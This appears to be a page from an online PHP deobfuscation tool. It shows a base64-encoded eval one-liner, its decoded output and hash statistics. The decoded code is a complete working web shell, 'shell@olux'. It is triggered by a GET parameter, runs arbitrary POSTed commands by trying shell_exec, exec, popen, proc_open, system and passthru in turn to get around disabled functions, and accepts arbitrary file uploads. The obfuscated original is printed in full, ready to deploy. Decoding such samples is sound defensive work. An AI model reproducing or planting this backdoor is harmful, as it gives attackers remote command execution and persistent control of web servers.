Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(base64_decode('aWYgKCRfR0VUWydhcGknXSA9PSAib2x1eCIpIHsKCgllY2hvICc8aHRtbCBsYW5..
Decoded Output download
if ($_GET['api'] == "olux") {
echo '<html lang="en">';
echo '<body>';
echo '<h2>shell@olux >_ </h2>';
echo '<form method="post">';
echo '<input type="text" name="cmd" id="cmd" value=""></input>';
echo '<button type="submit">Execute</button>';
echo '</form>';
echo '</body>';
echo '</html>';
$retval = "";
$cmd = "";
if (!empty($_POST['cmd'])) {
$funcs_all = array("shell_exec","exec","system","popen","passthru","proc_open");
$funcs_str = ini_get('disable_functions');
$funcs_str = str_replace(' ', '', $funcs_str);
$funcs = explode(',',$funcs_str);
foreach ( $funcs_all as $val ) {
$exist = 0;
foreach ( $funcs as $val2 ) {
if ( $val == $val2 ) { $exist = 1;}
}
if ( $exist == 0 ) {
$func_hl = $val;
break;
}
}
switch ($func_hl) {
case "shell_exec":
$cmd = shell_exec($_POST['cmd']);
$fp = fopen('output.txt','w');
fwrite($fp,$cmd);
fclose($fp);
break;
case "exec":
exec($_POST['cmd'], $cmd, $retval);
$fp = fopen('output.txt','w');
foreach($cmd as $buff) {fwrite($fp,"$buff
");}
fclose($fp);
break;
case "popen":
$hdl = popen($_POST['cmd'],'r');
$cmd = fread($hdl,1024000);
$fp = fopen('output.txt','w');
fwrite($fp,$cmd);
pclose($hdl);
fclose($fp);
break;
case "proc_open":
$proc=proc_open($_POST['cmd'],array(array("pipe","r"),array("pipe","w"),array("pipe","w")),$pipes);
$fp = fopen('output.txt','w');
$cmd = stream_get_contents($pipes[1]);
fwrite($fp,$cmd);
proc_close($proc);
fclose($fp);
break;
case "system":
system($_POST['cmd'], $retval);
break;
case "passthru":
passthru($_POST['cmd'], $retval);
break;
default:
echo "no function available";
}
}
if ( !empty($cmd) ) {
if ( file_exists('output.txt') ) {
$fp = fopen('output.txt','r');
while( !feof($fp) ) { echo fgets($fp) . "<br>"; }
fclose($fp);
unlink('output.txt');
}
}
if(!isset($directory))
$directory = '/';
else { if(!preg_match('/.*\/$/', $directory)) { $directory .= '/'; } }
if(preg_match('/^cd (.*)/', $command, $resbuf)) {
if(!preg_match('/^\/.*/', $resbuf[1])) { $directory .= $resbuf[1]; }
else { $directory = $resbuf[1]; }
}
if(isset($command))
{
echo '<pre><hr><xmp>';
passthru("cd $directory; $command");
}
echo '<form enctype="multipart/form-data" action="" method="post">';
echo '<input type="hidden" name="MAX_FILE_SIZE" value="1000000000">';
echo '<input name="userfile" type="file" />';
echo '<input name="submit" type="submit" value="Upload" />';
echo '</form>';
if (@is_uploaded_file($_FILES["userfile"]["tmp_name"])) {
copy($_FILES["userfile"]["tmp_name"], "" . $_FILES["userfile"]["name"]);
echo "<p>File Uploaded</p>";
}
}
Did this file decode correctly?
Original Code
<?php
eval(base64_decode('aWYgKCRfR0VUWydhcGknXSA9PSAib2x1eCIpIHsKCgllY2hvICc8aHRtbCBsYW5nPSJlbiI+JzsKCWVjaG8gJzxib2R5Pic7CgllY2hvICc8aDI+c2hlbGxAb2x1eCA+XyA8L2gyPic7CgllY2hvICc8Zm9ybSBtZXRob2Q9InBvc3QiPic7CgllY2hvICc8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIiBpZD0iY21kIiB2YWx1ZT0iIj48L2lucHV0Pic7CgllY2hvICc8YnV0dG9uIHR5cGU9InN1Ym1pdCI+RXhlY3V0ZTwvYnV0dG9uPic7CgllY2hvICc8L2Zvcm0+JzsKCWVjaG8gJzwvYm9keT4nOwoJZWNobyAnPC9odG1sPic7CgoJJHJldHZhbCA9ICIiOwoJJGNtZCA9ICIiOwoKCglpZiAoIWVtcHR5KCRfUE9TVFsnY21kJ10pKSB7CgoJCSRmdW5jc19hbGwgPSBhcnJheSgic2hlbGxfZXhlYyIsImV4ZWMiLCJzeXN0ZW0iLCJwb3BlbiIsInBhc3N0aHJ1IiwicHJvY19vcGVuIik7CgkJJGZ1bmNzX3N0ciA9IGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CgkJJGZ1bmNzX3N0ciA9IHN0cl9yZXBsYWNlKCcgJywgJycsICRmdW5jc19zdHIpOwoJCSRmdW5jcyA9IGV4cGxvZGUoJywnLCRmdW5jc19zdHIpOwoKCQlmb3JlYWNoICggJGZ1bmNzX2FsbCBhcyAkdmFsICkgewoJCQkkZXhpc3QgPSAwOwkKCQkJZm9yZWFjaCAoICRmdW5jcyBhcyAkdmFsMiApIHsKCQkJCWlmICggJHZhbCA9PSAkdmFsMiApIHsgJGV4aXN0ID0gMTt9CgkJCX0KCQoJCQlpZiAoICRleGlzdCA9PSAwICkgewoJCQkJJGZ1bmNfaGwgPSAkdmFsOwoJCQkJYnJlYWs7CgkJCX0KCQl9CgoKCQlzd2l0Y2ggKCRmdW5jX2hsKSB7CgkJCWNhc2UgInNoZWxsX2V4ZWMiOgoJCQkJJGNtZCA9IHNoZWxsX2V4ZWMoJF9QT1NUWydjbWQnXSk7CgkJCQkkZnAgPSBmb3Blbignb3V0cHV0LnR4dCcsJ3cnKTsKCQkJCWZ3cml0ZSgkZnAsJGNtZCk7CgkJCQlmY2xvc2UoJGZwKTsKCQkJCWJyZWFrOwoJCQljYXNlICJleGVjIjoKCQkJCWV4ZWMoJF9QT1NUWydjbWQnXSwgJGNtZCwgJHJldHZhbCk7CgkJCQkkZnAgPSBmb3Blbignb3V0cHV0LnR4dCcsJ3cnKTsKCQkJCWZvcmVhY2goJGNtZCBhcyAkYnVmZikge2Z3cml0ZSgkZnAsIiRidWZmXG4iKTt9CgkJCQlmY2xvc2UoJGZwKTsKCQkJCWJyZWFrOwoJCQljYXNlICJwb3BlbiI6CgkJCQkkaGRsID0gcG9wZW4oJF9QT1NUWydjbWQnXSwncicpOwoJCQkJJGNtZCA9IGZyZWFkKCRoZGwsMTAyNDAwMCk7CgkJCQkkZnAgPSBmb3Blbignb3V0cHV0LnR4dCcsJ3cnKTsKCQkJCWZ3cml0ZSgkZnAsJGNtZCk7CgkJCQlwY2xvc2UoJGhkbCk7CgkJCQlmY2xvc2UoJGZwKTsKCQkJCWJyZWFrOwoJCQljYXNlICJwcm9jX29wZW4iOgoJCQkJJHByb2M9cHJvY19vcGVuKCRfUE9TVFsnY21kJ10sYXJyYXkoYXJyYXkoInBpcGUiLCJyIiksYXJyYXkoInBpcGUiLCJ3IiksYXJyYXkoInBpcGUiLCJ3IikpLCRwaXBlcyk7CgkJCQkkZnAgPSBmb3Blbignb3V0cHV0LnR4dCcsJ3cnKTsKCQkJCSRjbWQgPSBzdHJlYW1fZ2V0X2NvbnRlbnRzKCRwaXBlc1sxXSk7CgkJCQlmd3JpdGUoJGZwLCRjbWQpOwoJCQkJcHJvY19jbG9zZSgkcHJvYyk7CgkJCQlmY2xvc2UoJGZwKTsKCQkJCWJyZWFrOwoJCQljYXNlICJzeXN0ZW0iOgoJCQkJc3lzdGVtKCRfUE9TVFsnY21kJ10sICRyZXR2YWwpOwoJCQkJYnJlYWs7CgkJCWNhc2UgInBhc3N0aHJ1IjoKCQkJCXBhc3N0aHJ1KCRfUE9TVFsnY21kJ10sICRyZXR2YWwpOwoJCQkJYnJlYWs7CgkJCWRlZmF1bHQ6CgkJCQllY2hvICJubyBmdW5jdGlvbiBhdmFpbGFibGUiOwoJCX0KCX0KCiAgICAgICAgaWYgKCAhZW1wdHkoJGNtZCkgKSB7CgoJCWlmICggZmlsZV9leGlzdHMoJ291dHB1dC50eHQnKSApIHsKCQkKCQkJJGZwID0gZm9wZW4oJ291dHB1dC50eHQnLCdyJyk7CgkJCXdoaWxlKCAhZmVvZigkZnApICkgeyBlY2hvIGZnZXRzKCRmcCkgLiAiPGJyPiI7IH0KCQkJZmNsb3NlKCRmcCk7CgkJCXVubGluaygnb3V0cHV0LnR4dCcpOwoJCX0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCglpZighaXNzZXQoJGRpcmVjdG9yeSkpCgkJJGRpcmVjdG9yeSA9ICcvJzsKCWVsc2UgeyBpZighcHJlZ19tYXRjaCgnLy4qXC8kLycsICRkaXJlY3RvcnkpKSB7ICRkaXJlY3RvcnkgLj0gJy8nOyB9IH0KCQoJaWYocHJlZ19tYXRjaCgnL15jZCAoLiopLycsICRjb21tYW5kLCAkcmVzYnVmKSkgewogIAkJaWYoIXByZWdfbWF0Y2goJy9eXC8uKi8nLCAkcmVzYnVmWzFdKSkgeyAkZGlyZWN0b3J5IC49ICRyZXNidWZbMV07IH0KICAJCWVsc2UgeyAkZGlyZWN0b3J5ID0gJHJlc2J1ZlsxXTsgfQoJfQoKCWlmKGlzc2V0KCRjb21tYW5kKSkKCXsKCQllY2hvICc8cHJlPjxocj48eG1wPic7CgkJcGFzc3RocnUoImNkICRkaXJlY3Rvcnk7ICRjb21tYW5kIik7Cgl9CgoJZWNobyAnPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+JzsKCWVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Ik1BWF9GSUxFX1NJWkUiIHZhbHVlPSIxMDAwMDAwMDAwIj4nOwoJZWNobyAnPGlucHV0IG5hbWU9InVzZXJmaWxlIiB0eXBlPSJmaWxlIiAvPic7CgllY2hvICc8aW5wdXQgbmFtZT0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIC8+JzsKCWVjaG8gJzwvZm9ybT4nOwoKCWlmIChAaXNfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJ1c2VyZmlsZSJdWyJ0bXBfbmFtZSJdKSkgewoJCWNvcHkoJF9GSUxFU1sidXNlcmZpbGUiXVsidG1wX25hbWUiXSwgIiIgLiAkX0ZJTEVTWyJ1c2VyZmlsZSJdWyJuYW1lIl0pOwoJCWVjaG8gIjxwPkZpbGUgVXBsb2FkZWQ8L3A+IjsKCX0KCn0='));
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 2ee5115c6e8fc34b2dfc0a0b5b37458e |
Eval Count | 1 |
Decode Time | 58 ms |